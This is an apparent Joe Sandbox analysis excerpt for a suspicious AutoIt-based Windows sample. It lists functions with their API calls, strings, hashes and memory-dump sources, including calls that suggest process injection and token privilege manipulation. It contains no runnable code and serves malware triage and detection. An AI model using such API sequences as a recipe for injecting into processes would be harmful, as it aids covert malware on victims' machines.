Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: __fclose_nolock__getptd_noexit__lock__lock_file
String ID:
API String ID: 2800547568-0
Opcode ID: 8ee4cad98bae9b35ec00c05576db4bb0b78dc8c431629976dd8a38964cf8c0fc
Instruction ID: 1ff1c70a14d719891cccaf52fb19736b4bdb8b7e4d43fc4ba5accb3913403f2e
Opcode Fuzzy Hash: 8ee4cad98bae9b35ec00c05576db4bb0b78dc8c431629976dd8a38964cf8c0fc
Instruction Fuzzy Hash: B2F0F631802E209EDB60BB64BC017ED66E26F41374F20810CE421AB1C1DBBC49415F59

Function 01642FFD Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 016437BB
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01643851
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01643873

Memory Dump Source

Source File: 00000000.00000002.1516329390.0000000001641000.00000040.00000020.00020000.00000000.sdmp, Offset: 01641000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1641000_lsc5QN46NH.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
Instruction ID: 5bc2a8fdf9de19416ab5534cff1c7fc803d578fc57cad5e69bcb503a2bf60eab
Opcode Fuzzy Hash: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
Instruction Fuzzy Hash: 7312CD24E24658C7EB24DF64D8507DEB232FF68300F1090E9910DEB7A5E77A4E85CB5A

Function 00620C08 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 00620CB7

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: 655e0ff491d1daf99290ba609769d0f3e661bc6a9b982cba353b84ac26e937e9
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: 6631D4B0B005159BE718DF58E4849A9F7A6FB59300B6487A5E80ACB352D731EDC1DFC0

Function 0063FCAC Relevance: 1.6, APIs: 1, Instructions: 88COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 0063FCB7

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 2819b0e6571293c0184ff43193c013e4b761c76e0f5239989d7e55a83e21d9ba
Instruction ID: 60fe882153155c7fb15eb918d5adf1e8989bb9f465f93941a49e283bfb0527c5
Opcode Fuzzy Hash: 2819b0e6571293c0184ff43193c013e4b761c76e0f5239989d7e55a83e21d9ba
Instruction Fuzzy Hash: 764138745443519FDB18DF14C448B5ABBE2BF45318F0988ACE8998B7A2C371EC45CF52

Function 00607B53 Relevance: 1.6, APIs: 1, Instructions: 84COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00607BB3

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 99f5eec6508beeb5fd9eba17d2f564fa1264fed6861514bcd76dc85e2acc4a94
Instruction ID: a49fd08325e455163e88ce67987edec61aa4207195d10e01f4a3861f8df7c1e8
Opcode Fuzzy Hash: 99f5eec6508beeb5fd9eba17d2f564fa1264fed6861514bcd76dc85e2acc4a94
Instruction Fuzzy Hash: 2F2163B2A04A09EBDB148F21E8417AE7BF6FF14350F21856EE896C51D0EB31D1D0CBA5

Function 00604DDD Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00604BB5: FreeLibrary.KERNEL32(00000000,?), ref: 00604BEF

Part of subcall function 0062525B: __wfsopen.LIBCMT ref: 00625266

LoadLibraryExW.KERNEL32(?,00000000,00000002,?,006C52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00604E0F

Part of subcall function 00604B6A: FreeLibrary.KERNEL32(00000000), ref: 00604BA4

Part of subcall function 00604C70: _memmove.LIBCMT ref: 00604CBA

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: Library$Free$Load__wfsopen_memmove
String ID:
API String ID: 1396898556-0
Opcode ID: 5bc4dceaeabb64479539e94a6653ed7e22fb2ea1d446672807cdcc6a383241e6
Instruction ID: b5695db0a7c3f14647e13b10df83a561d40cc44de510f904caa6a13d908d16aa
Opcode Fuzzy Hash: 5bc4dceaeabb64479539e94a6653ed7e22fb2ea1d446672807cdcc6a383241e6
Instruction Fuzzy Hash: C711C171680205ABCF38AF70C812FAE77AAAF84750F10882DF642A71C1DF719A019B94

Function 0063FD85 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32(?), ref: 0063FD91

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 108c61470e10cf36ef8bc102df152360ea5d9ee67882e524dd3250b827921ee1
Instruction ID: 5471263c1434919b8aeac41f6cc9d4f2f26345dbe359969f316948dd796d4139
Opcode Fuzzy Hash: 108c61470e10cf36ef8bc102df152360ea5d9ee67882e524dd3250b827921ee1
Instruction Fuzzy Hash: 202133B4948311DFDB18DF64C844A5BBBE2BF88314F05896CE88A577A2D731E805CB92

Function 00624863 Relevance: 1.5, APIs: 1, Instructions: 36COMMON

Download Yara Rule

APIs

__lock_file.LIBCMT ref: 006248A6

Part of subcall function 00628B28: __getptd_noexit.LIBCMT ref: 00628B28

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: __getptd_noexit__lock_file
String ID:
API String ID: 2597487223-0
Opcode ID: 2532f08ca27b888bc04f40227af94fee811acfa4496522b9f368533131007dc4
Instruction ID: f1a59028be2faad4cd4e51eef25ac3ca54cbd07030b4c03b6ac0c8d0ae65be29
Opcode Fuzzy Hash: 2532f08ca27b888bc04f40227af94fee811acfa4496522b9f368533131007dc4
Instruction Fuzzy Hash: EFF0DC31911A28ABDF91AFA4AC063EE36A2AF01321F018408F4209B281DF7CC991DF55

Function 00604E4A Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,006C52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00604E7E

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 82e669679549af56e8484ff451a70e3148d791f6216c75315842980cc81fa3d7
Instruction ID: 741b18a88f6e51c2d75ef3f6cf7f5beff1b6426a478d7b3e18abb491461aa4b0
Opcode Fuzzy Hash: 82e669679549af56e8484ff451a70e3148d791f6216c75315842980cc81fa3d7
Instruction Fuzzy Hash: D7F015B1545B11DFCB389F64E494853BBE2BF143693208A3EE2D682661CB32A840DF40

Function 00620791 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 006207B0

Part of subcall function 00607BCC: _memmove.LIBCMT ref: 00607C06

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: LongNamePath_memmove
String ID:
API String ID: 2514874351-0
Opcode ID: fb70c691a281ff0ea9a4e851748ae79872069b645a9790e8ec2ec480633f7fa5
Instruction ID: 901abd7a38c3909da2a7176d5d889e18003b15f0fe761d7ce76eab83a676889b
Opcode Fuzzy Hash: fb70c691a281ff0ea9a4e851748ae79872069b645a9790e8ec2ec480633f7fa5
Instruction Fuzzy Hash: 60E0CD3694412857C720D6989C05FEA77DEDFC97A1F0541B5FC0CD7244DD60AD8086D4

Function 00668E9F Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 00668EC1

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: 36e66934677415102e9643fee0822ecf6e22e0db5db5ed1a6e3653ba213ae753
Instruction ID: fd159f2428316f1a9fdfdcc95dba56dd633e51de4abf976747366276545eb4d4
Opcode Fuzzy Hash: 36e66934677415102e9643fee0822ecf6e22e0db5db5ed1a6e3653ba213ae753
Instruction Fuzzy Hash: 71E092B0104B005FD7388A24D800BE373E2AB05304F00091DF2AA93341EB63B8418B59

Function 0062525B Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

__wfsopen.LIBCMT ref: 00625266

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: __wfsopen
String ID:
API String ID: 197181222-0
Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction ID: 1be3a552245d0f50d3d7871c49eb1db028e992cf7e7bf95a53f563eb90f9c25a
Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction Fuzzy Hash: BBB0927644060CB7CE112A82FC02A593B1A9B41764F408020FB0C1C1A2A673A6649A89

Function 01644000 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 01644011

Memory Dump Source

Source File: 00000000.00000002.1516329390.0000000001641000.00000040.00000020.00020000.00000000.sdmp, Offset: 01641000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1641000_lsc5QN46NH.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction ID: 5f8f7301f6ce5ae7c5d8bdc08fabbebf002588474760b4ba4631f98fd166736b
Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction Fuzzy Hash: A9E0BF7494410DDFDB00EFB4D94969E7BB4EF04702F100161FD0192281DA309D608A62

Non-executed Functions

Function 0068CABC Relevance: 75.9, APIs: 40, Strings: 3, Instructions: 632windowkeyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 00602612: GetWindowLongW.USER32(?,000000EB), ref: 00602623

DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0068CB37
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0068CB95
GetWindowLongW.USER32(?,000000F0), ref: 0068CBD6
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0068CC00
SendMessageW.USER32 ref: 0068CC29
_wcsncpy.LIBCMT ref: 0068CC95
GetKeyState.USER32(00000011), ref: 0068CCB6
GetKeyState.USER32(00000009), ref: 0068CCC3
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0068CCD9
GetKeyState.USER32(00000010), ref: 0068CCE3
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0068CD0C
SendMessageW.USER32 ref: 0068CD33
SendMessageW.USER32(?,00001030,?,0068B348), ref: 0068CE37
ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0068CE4D
ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0068CE60
SetCapture.USER32(?), ref: 0068CE69
ClientToScreen.USER32(?,?), ref: 0068CECE
ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0068CEDB
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0068CEF5
ReleaseCapture.USER32 ref: 0068CF00
GetCursorPos.USER32(?), ref: 0068CF3A
ScreenToClient.USER32(?,?), ref: 0068CF47
SendMessageW.USER32(?,00001012,00000000,?), ref: 0068CFA3
SendMessageW.USER32 ref: 0068CFD1
SendMessageW.USER32(?,00001111,00000000,?), ref: 0068D00E
SendMessageW.USER32 ref: 0068D03D
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0068D05E
SendMessageW.USER32(?,0000110B,00000009,?), ref: 0068D06D
GetCursorPos.USER32(?), ref: 0068D08D
ScreenToClient.USER32(?,?), ref: 0068D09A
GetParent.USER32(?), ref: 0068D0BA
SendMessageW.USER32(?,00001012,00000000,?), ref: 0068D123
SendMessageW.USER32 ref: 0068D154
ClientToScreen.USER32(?,?), ref: 0068D1B2
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0068D1E2
SendMessageW.USER32(?,00001111,00000000,?), ref: 0068D20C
SendMessageW.USER32 ref: 0068D22F
ClientToScreen.USER32(?,?), ref: 0068D281
TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0068D2B5

Part of subcall function 006025DB: GetWindowLongW.USER32(?,000000EB), ref: 006025EC

GetWindowLongW.USER32(?,000000F0), ref: 0068D351

Strings

pbl, xrefs: 0068CEAF
@GUI_DRAGID, xrefs: 0068CE9C
F, xrefs: 0068D235

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
String ID: @GUI_DRAGID$F$pbl
API String ID: 3977979337-1181734586
Opcode ID: c34db9a20c90e36ac27d05e100d66b2758b04f8aa29a1cb4e24d23a4b54eeb49
Instruction ID: 7b89d2e3418b26ba3ab0119e868d15162d63223430b6e1048292a91d49086b47
Opcode Fuzzy Hash: c34db9a20c90e36ac27d05e100d66b2758b04f8aa29a1cb4e24d23a4b54eeb49
Instruction Fuzzy Hash: 1B42AD74204641AFD724EF24CC58EAABBE6FF49320F14071DF699972A1D771E880DB62

Function 00616F9E Relevance: 55.8, APIs: 19, Strings: 10, Instructions: 5018COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 006171C3
_memset.LIBCMT ref: 00617539
_memmove.LIBCMT ref: 006176AC

Strings

[:>:]], xrefs: 00617492
P\k, xrefs: 00651AB8
\b(?=\w), xrefs: 00653769
\b(?<=\w), xrefs: 00653773
]k, xrefs: 00651A22
_a, xrefs: 006523CB
Q\E, xrefs: 00617FCB
DEFINE, xrefs: 00652103
[:<:]], xrefs: 00617479
3ca, xrefs: 006523A0

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: _memmove$_memset
String ID: ]k$3ca$DEFINE$P\k$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)$_a
API String ID: 1357608183-4102086565
Opcode ID: f8ddcbc90455653cf6d6dbc6d21b3f83541cbdf9d0b9cc90f3c83512b4da9f19
Instruction ID: a8ccd7da8cd39271e6a00a63a4db693abb0ed0408eb7d19700bff581eaee42c7
Opcode Fuzzy Hash: f8ddcbc90455653cf6d6dbc6d21b3f83541cbdf9d0b9cc90f3c83512b4da9f19
Instruction Fuzzy Hash: 15939275A0421A9FDB24CF58C8917EDB7B2FF48711F24816AED45AB381E7709E86CB40

Function 006048D7 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,?), ref: 006048DF
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0063D665
IsIconic.USER32(?), ref: 0063D66E
ShowWindow.USER32(?,00000009), ref: 0063D67B
SetForegroundWindow.USER32(?), ref: 0063D685
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0063D69B
GetCurrentThreadId.KERNEL32 ref: 0063D6A2
GetWindowThreadProcessId.USER32(?,00000000), ref: 0063D6AE
AttachThreadInput.USER32(?,00000000,00000001), ref: 0063D6BF
AttachThreadInput.USER32(?,00000000,00000001), ref: 0063D6C7
AttachThreadInput.USER32(00000000,?,00000001), ref: 0063D6CF
SetForegroundWindow.USER32(?), ref: 0063D6D2
MapVirtualKeyW.USER32(00000012,00000000), ref: 0063D6E7
keybd_event.USER32(00000012,00000000), ref: 0063D6F2
MapVirtualKeyW.USER32(00000012,00000000), ref: 0063D6FC
keybd_event.USER32(00000012,00000000), ref: 0063D701
MapVirtualKeyW.USER32(00000012,00000000), ref: 0063D70A
keybd_event.USER32(00000012,00000000), ref: 0063D70F
MapVirtualKeyW.USER32(00000012,00000000), ref: 0063D719
keybd_event.USER32(00000012,00000000), ref: 0063D71E
SetForegroundWindow.USER32(?), ref: 0063D721
AttachThreadInput.USER32(?,?,00000000), ref: 0063D748

Strings

Shell_TrayWnd, xrefs: 0063D660

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 4125248594-2988720461
Opcode ID: 898e50b5063dc4265de2f3338c93162dcea1d55a3cd1a8ddbe80dfaf9814c6c1
Instruction ID: c15f546ec3599408cc9bc049c1f92eef604c631c08ee696d38e7a85120ba09e8
Opcode Fuzzy Hash: 898e50b5063dc4265de2f3338c93162dcea1d55a3cd1a8ddbe80dfaf9814c6c1
Instruction Fuzzy Hash: 77316571A80318BBEB206F619C49FBF7F6EEB44B50F104125FA04EA1D1D6B05D51ABA1

Function 00658310 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224COMMON

Download Yara Rule

APIs

Part of subcall function 006587E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0065882B
Part of subcall function 006587E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00658858
Part of subcall function 006587E1: GetLastError.KERNEL32 ref: 00658865

_memset.LIBCMT ref: 00658353
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 006583A5
CloseHandle.KERNEL32(?), ref: 006583B6
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 006583CD
GetProcessWindowStation.USER32 ref: 006583E6
SetProcessWindowStation.USER32(00000000), ref: 006583F0
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 0065840A

Part of subcall function 006581CB: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00658309), ref: 006581E0
Part of subcall function 006581CB: CloseHandle.KERNEL32(?,?,00658309), ref: 006581F2

Strings

default, xrefs: 00658405
winsta0, xrefs: 006583C8
, xrefs: 00658362

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
String ID: $default$winsta0
API String ID: 2063423040-1027155976
Opcode ID: da505d226eb163697843ef4fa495fef1bdb82a007b5373939cdbe679a25abd8f
Instruction ID: d27092474929adf30f93e23bd19347c164940e934dae139e9c35826a3bbf0db4
Opcode Fuzzy Hash: da505d226eb163697843ef4fa495fef1bdb82a007b5373939cdbe679a25abd8f
Instruction Fuzzy Hash: 0F8157B1900209BFDF519FA4DC45AEE7BBAAF08305F144269FC10B7261EB318A58DB20

Function 0066C75C Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 0066C78D
FindClose.KERNEL32(00000000), ref: 0066C7E1
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0066C806
